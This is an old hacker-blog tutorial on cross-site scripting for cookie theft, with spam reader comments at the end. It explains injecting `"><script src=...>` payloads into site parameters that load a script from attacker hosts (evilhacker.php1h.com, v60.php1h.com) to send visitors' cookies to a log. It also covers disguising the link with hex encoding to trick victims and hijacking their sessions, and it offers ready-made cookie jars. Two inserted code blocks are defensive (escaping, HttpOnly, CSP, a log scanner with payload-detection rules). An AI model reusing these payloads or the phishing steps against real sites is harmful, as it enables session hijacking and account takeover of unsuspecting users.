Cross-site scripting (XSS) cookie stealing tutorial

So what is an XSS attack? It is the art of running scripts on your victim's PC. With the right knowledge you can run almost any script in their browser, and the most common use of XSS is stealing cookies.
Cookies are bits of information used by web servers / web sites to check who you are on that site.
If you are a guest, the site sets a cookie saying you are a guest. When you log in, it replaces that cookie with the one for your login, which will hold your login ID and sometimes, if it is a forum, your password as an MD5 hash,
plus whatever else the site can think of using to make sure you are who you say you are,
like session IDs that expire after a time limit the server sets, such as 10 or 60 minutes.
The cookie has named sections, so when the server checks who you are
it reads bits of data like the ID and the MD5 hash. If it is a forum, most
of the time it will be using the default cookie prefix, like
nukeevo_ID and so on, but the forum admin can change that.


What is a user ID? If you are the first to sign up to a forum, your ID will be 1, because you
will be the first row in the SQL table ... I will talk about the SQL tables later. The admin account
nearly always has ID 1 or 2, because of course the admin had to create that account first
to configure the forum. There are several ways of looking for this type of attack.
From the hacker's point of view, the aim is to get the script to run no matter what, trying every way
he or she can find. On MySpace, because MySpace filters JavaScript, they were using Flash files not to steal cookies
but instead to redirect to a fake login page; the files for this can be found in downloads.
That was using .swf files, but the newest one for MySpace uses .mov (QuickTime) files
to load a URL that points to your fake login. A good FREE server for hosting PHP files is
www.php1h.com. You would upload your cookie stealing scripts to that server so you can send the user's cookie
to that site and view it in the log.

OK, here is how you could set it up:

http://evilhacker.php1h.com/cookiestealer.php = this is the backbone; it takes the cookie from the JavaScript we run, called xss.js

http://evilhacker.php1h.com/log.php    = this is the log where the cookie ends up after cookiestealer.php has sent it there

www.evilhacker.php1h.com/xss.js     = this is the JavaScript that gives the cookie to cookiestealer.php


: finding XSS attacks :
The first way is to browse the site looking for any input boxes, and then view the source of the page for the name of the input
box we find an XSS exploit in. When looking for an XSS, make sure
you look at the URL in the URL bar; you might see something that looks like
www.site.com/blah.html or .php or .cfm or .jsp ..
Make sure you have the full URL, and if it has parameters after a ? mark, add yours at the end of the URL using a &, like this:
www.site.com/page.php?MID=2&(NAME_OF_INPUT_BOX)=(script) So say the input box was called milk (I don't know why, but just for this tutorial let's say that), and that the script will just print the word Xss on screen.

www.site.com/page.php?MID=2&MILK="><script>alert("Xss")</script>

The "> is there because it tells the input box to stop reading at that point (the " closes the value attribute and the > closes the tag), and then the JavaScript runs.
If the input box was called cat, it would look like this:

www.site.com/page.php?MID=2&cat="><script>alert("Xss")</script>

So go round a site looking for any type of input box. Sometimes I find that if a site has a
"send to a friend" feature, that email box sometimes works.

After you have found it (you get a pop-up with the word Xss in it), view the source and look for the word Xss in an input box. The basic syntax will look like this:

<input type="hidden" name="milk" value="" />
You see, and from there you will make the URL,
which I will talk about at the end. So after finding an XSS that you are able to run in your browser,
you will want to start running the cookie grabbing scripts in your browser. They will look like this:

www.site.com/page.php?MID=2&MILK="><script src="http://evilhacker.php1h.com/xss.js"></script>

If you sent someone that link in an email or on MSN, it would run in their browser
and execute that JavaScript to steal their cookies for site.com. So if you found an XSS in msn.com,
you would have the cookies from msn.com.
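
Why the `">` breakout works on the hidden input shown above, and what stops it, as an added example that is not code from the original post. The function names, the `sid` cookie name and the header values are assumptions; the payload is the `MILK` value used in the post.

```javascript
// Added example, not code from the original post. Function names are hypothetical.
// PAYLOAD is the parameter value the post puts after MILK=.
const PAYLOAD = '"><script>alert("Xss")</script>';

// Vulnerable: the request value is concatenated straight into the attribute,
// so the leading "> closes value="..." and the <input> tag.
function renderInputVulnerable(value) {
  return '<input type="hidden" name="milk" value="' + value + '" />';
}

// Escape the five characters that can end an attribute value or open a tag.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Hardened: same markup, but the value can no longer leave the attribute.
function renderInputHardened(value) {
  return '<input type="hidden" name="milk" value="' + escapeHtml(value) + '" />';
}

// Count opening/closing tags in rendered markup; a single <input> should give 1.
function tagCount(html) {
  return (html.match(/<\/?[a-zA-Z]/g) || []).length;
}

// Defence in depth for the session cookie: HttpOnly keeps it out of
// document.cookie, so an injected script cannot read it; Secure and SameSite
// limit when the browser sends it.
function sessionCookieHeader(name, sessionId) {
  return `${name}=${encodeURIComponent(sessionId)}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

// Response header that stops the browser running inline script and script
// loaded from other hosts, which the <script src="http://..."> form relies on.
const CSP_HEADER = "Content-Security-Policy: script-src 'self'";

console.log(renderInputVulnerable(PAYLOAD), tagCount(renderInputVulnerable(PAYLOAD)));
console.log(renderInputHardened(PAYLOAD), tagCount(renderInputHardened(PAYLOAD)));
console.log('Set-Cookie: ' + sessionCookieHeader('sid', 'abc123'));
console.log(CSP_HEADER);
```

With the escaped version the page source shows the payload as text inside `value="..."`, and the tag count stays at one.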

But you might ask yourself: how do I swap my cookies? If you are using Firefox, there is an add-on you can install called Cookie Editor, and
then you can edit your cookies. Using IE, I'm sure you can edit them in the temporary internet files or something, but your best bet is FF (Firefox).
Just remember that when you steal the cookies they won't all be one long string; they should be broken up into names like UID and others, but you will just have
to work that out for yourself.

Sending the link to a victim can be hard work sometimes. If someone sent you a link that looked like this:
www.site.com/page.php?MID=2&MILK="><script src="http://evilhacker.php1h.com/xss.js"></script>    I wouldn't click it.
But :P if you encoded some of the characters in that URL into hex, like this,
using this table:
[img]http://62.31.49.95/asciifull.gif[/img]
you could encode it to look something like this:

%22%3E%3Cscript src=%22%http://evilhacker.php1h.com/xss.js%22>3E%3C/script%3E   = the script encoded in hex
Would you click that instead? And to send it through MSN you might want to add another & at the end and fill it with shit,
like
www.site.com/page.php?MID=2&MILK=%22%3E%3Cscript src=%22%http://evilhacker.php1h.com/xss.js%22>3E%3C/script%3E&mk=12   <- that would just make it think it needs to include the full link. There are other ways, like using .gif images to run the script on the site, but that's another story.
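
Hex encoding hides the markup from a person reading the link, not from a server that decodes the query string before checking it. The following is an added example, not part of the original post: it decodes each query parameter of a request line and flags script markup. The rule names, function names and sample log lines are constructed for illustration; the third line reuses the encoded URL from the post, malformed `%ht` sequence included.

```javascript
// Added example (not from the original post): flag request lines whose query
// parameters decode to script markup. Sample log lines are constructed.

// Tolerant percent-decoder: a malformed sequence such as "%ht" is left as-is
// (decodeURIComponent would throw). Bytes map 1:1, which is enough for ASCII rules.
function percentDecode(s) {
  return s.replace(/\+/g, ' ')
          .replace(/%([0-9a-fA-F]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

const RULES = [
  { name: 'script-tag', re: /<\s*script\b/i },
  { name: 'attribute-breakout', re: /["']\s*\/?>/ },
  { name: 'external-script-src', re: /<\s*script[^>]*\bsrc\s*=[^>]*\/\//i },
];

// Split "METHOD target PROTOCOL"; the target may contain raw spaces.
function parseRequestLine(line) {
  const parts = line.trim().split(' ');
  const method = parts.shift();
  const protocol = /^HTTP\//.test(parts[parts.length - 1]) ? parts.pop() : null;
  return { method, target: parts.join(' '), protocol };
}

// Return one finding per query parameter whose decoded value matches a rule.
function inspectRequestLine(line) {
  const { target } = parseRequestLine(line);
  const q = target.indexOf('?');
  if (q === -1) return [];
  const findings = [];
  for (const pair of target.slice(q + 1).split('&')) {
    if (!pair) continue;
    const eq = pair.indexOf('=');
    const param = percentDecode(eq === -1 ? pair : pair.slice(0, eq));
    const value = percentDecode(eq === -1 ? '' : pair.slice(eq + 1));
    const rules = RULES.filter((r) => r.re.test(value)).map((r) => r.name);
    if (rules.length) findings.push({ param, rules, value });
  }
  return findings;
}

// Constructed request lines; line 3 carries the encoded URL from the post.
const SAMPLE_LOG = [
  'GET /page.php?MID=2 HTTP/1.1',
  'GET /page.php?MID=2&MILK=%22%3E%3Cscript%3Ealert(%22Xss%22)%3C/script%3E HTTP/1.1',
  'GET /page.php?MID=2&MILK=%22%3E%3Cscript src=%22%http://evilhacker.php1h.com/xss.js%22>3E%3C/script%3E&mk=12 HTTP/1.1',
  'GET /search.php?q=tom+%26+jerry HTTP/1.1',
];

// Report the 1-based line numbers that produced findings.
function scanLog(lines) {
  return lines.map((line, i) => ({ line: i + 1, findings: inspectRequestLine(line) }))
              .filter((r) => r.findings.length > 0);
}

console.log(JSON.stringify(scanLog(SAMPLE_LOG), null, 2));
```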

Well, that's it for now; hope you enjoyed the read.
VOl :v60-hackers:

:info:
I have set up some cookie jars for the people too lazy

http://v60.php1h.com/cookiejar/xss.js
http://v60.php1h.com/cookiejar/log.php

18 comments:

  1. thanks for the posts majority of them had helped me and now its one of my best helping blog for me nice...work keep it up

  2. You are genius dude, hats off to you. Keep doing like this. Hosting Raja Review

  3. This article clears my mind. Writer has done great job. Best thing about this blog is its simplicity. Thank you so much. Keep posting
    Geometrydashonline.net
    Basketballlegendsgame.com
